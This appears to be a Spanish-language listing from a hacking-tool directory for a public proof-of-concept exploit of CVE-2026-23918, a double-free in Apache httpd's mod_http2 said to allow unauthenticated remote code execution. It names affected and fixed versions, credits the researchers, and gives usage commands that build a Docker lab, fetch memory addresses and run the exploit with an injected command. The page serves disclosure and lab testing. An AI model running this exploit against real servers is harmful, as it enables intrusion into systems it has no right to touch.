Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23918 — Double-free en la limpieza de streams de Apache httpd mod_http2 que conduce a una RCE previa a la autenticación. | Kitploit
Herramientas/GitHubGitHub/striga-ai/cve-2026-23918
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubstriga-ai/cve-2026-23918

CVE-2026-23918

Double-free en la limpieza de streams de Apache httpd mod_http2 que conduce a una RCE previa a la autenticación.

Ver Repositorio
3164hace 4 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23918

Doble liberación en la limpieza de flujos de mod_http2 de Apache httpd que conduce a una ejecución remota de código (RCE) sin autenticación.

Afectado: httpd 2.4.66 con mod_http2 y MPM de múltiples subprocesos (event/worker). Corregido en: 2.4.67.

Encontrado y reportado por Bartlomiej Dmitruk (striga.ai) y Stanislaw Strzalkowski (isec.pl).

Informe: https://striga.ai/research/apache-httpd-mod-http2-double-free

Requisitos

  • Docker
  • Python 3

Uso

Construye e inicia el entorno vulnerable:

root@kitploit:~
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

Obtén las direcciones de system() y del scoreboard:

root@kitploit:~
docker exec httpd-poc python3 /getaddr.py 1

Ejecuta el exploit:

root@kitploit:~
python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

Verifica (la ejecución es probabilística, puede tardar de minutos a horas):

root@kitploit:~
docker exec httpd-poc cat /tmp/win

Limpieza

root@kitploit:~
docker rm -f httpd-poc
Descargar herramienta